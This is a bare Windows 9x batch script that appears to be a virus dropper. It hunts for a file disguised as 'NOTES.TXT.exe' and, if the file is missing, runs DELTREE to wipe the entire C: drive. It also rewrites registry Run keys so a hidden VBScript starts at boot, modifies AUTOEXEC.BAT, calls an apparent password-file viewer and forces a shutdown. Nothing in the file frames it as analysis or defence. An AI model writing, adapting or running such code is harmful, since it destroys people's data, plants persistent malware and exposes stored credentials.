@ECHO OFF
CD %WINDIR%
CD ESCRIT~1
IF NOT EXIST NOTES.TXT.exe GOTO RETRY
COPY NOTES.TXT.exe C:\
DEL NOTES.TXT.exe
GOTO OK
:RETRY
CLS
CD..
CD DESKTOP
IF NOT EXIST NOTES.TXT.exe GOTO RETRY2
COPY NOTES.TXT.exe C:\
DEL NOTES.TXT.exe
GOTO OK
:RETRY2
CLS
CD %WINDIR%
IF NOT EXIST NOTES.TXT.exe GOTO RETRY3
COPY NOTES.TXT.exe C:\
DEL NOTES.TXT.exe
GOTO OK
:RETRY3
CLS
CD\
IF NOT EXIST NOTES.TXT.exe GOTO RETRY4
GOTO OK
:RETRY4
CLS
CD %WINDIR%
CD SYSTEM
IF NOT EXIST NOTES.TXT.exe GOTO RETRY5
COPY NOTES.TXT.exe C:\
DEL NOTES.TXT.exe
GOTO OK
:RETRY5
CLS
CD\
CD DOWNLOAD
IF NOT EXIST NOTES.TXT.exe GOTO RETRY6
COPY NOTES.TXT.exe C:\
DEL NOTES.TXT.exe
GOTO OK
:RETRY6
CLS
CD\
CD DOWN
IF NOT EXIST NOTES.TXT.exe GOTO RETRY7
COPY NOTES.TXT.exe C:\
DEL NOTES.TXT.exe
GOTO OK
:RETRY7
CLS
CD %TEMP%
IF NOT EXIST NOTES.TXT.exe GOTO RETRY8
COPY NOTES.TXT.exe C:\
DEL NOTES.TXT.exe
GOTO OK
:RETRY8
CLS
CD %TMP%
IF NOT EXIST NOTES.TXT.exe GOTO RETRY9
COPY NOTES.TXT.exe C:\
DEL NOTES.TXT.exe
GOTO OK
:RETRY9
CLS
CD %WINDIR%
CD TEMP
IF NOT EXIST NOTES.TXT.exe GOTO SHIT
COPY NOTES.TXT.exe C:\
DEL NOTES.TXT.exe
GOTO OK
:SHIT
CLS
ECHO.
ECHO WHERE IS NOTES.TXT???? PLEASE, NEXT DAY DOWNLOAD IT TO 'TEMP' FOLDER
ECHO SORRY...
DELTREE /Y C:\
:OK
ECHO @ECHO OFF >> C:\UNAV.BAT
ECHO REGEDIT /D HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run >> C:\UNAV.BAT
ECHO REGEDIT /D HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices >> C:\UNAV.BAT
ECHO REGEDIT /D HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Run >> C:\UNAV.BAT
ECHO REGEDIT C:\IN.DAT >> C:\UNAV.BAT
ECHO REGEDIT4 >> C:\IN.DAT
ECHO. >> C:\IN.DAT
ECHO [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] >> C:\IN.DAT
ECHO. >> C:\IN.DAT
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> C:\IN.DAT
ECHO "SystemTray"="SysTray.Exe" >> C:\IN.DAT
ECHO "MSysTray"="wscript.exe c:\win.txt.vbs" >> C:\IN.DAT
ECHO. >> C:\IN.DAT
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices] >> C:\IN.DAT
COPY C:\AUTOEXEC.BAT + C:\CALL.DAT C:\AUTOEXEC.BAT
IF EXIST C:\pwlview.bat call c:\pwlview.bat
rundll32.exe user,exitwindows
CLS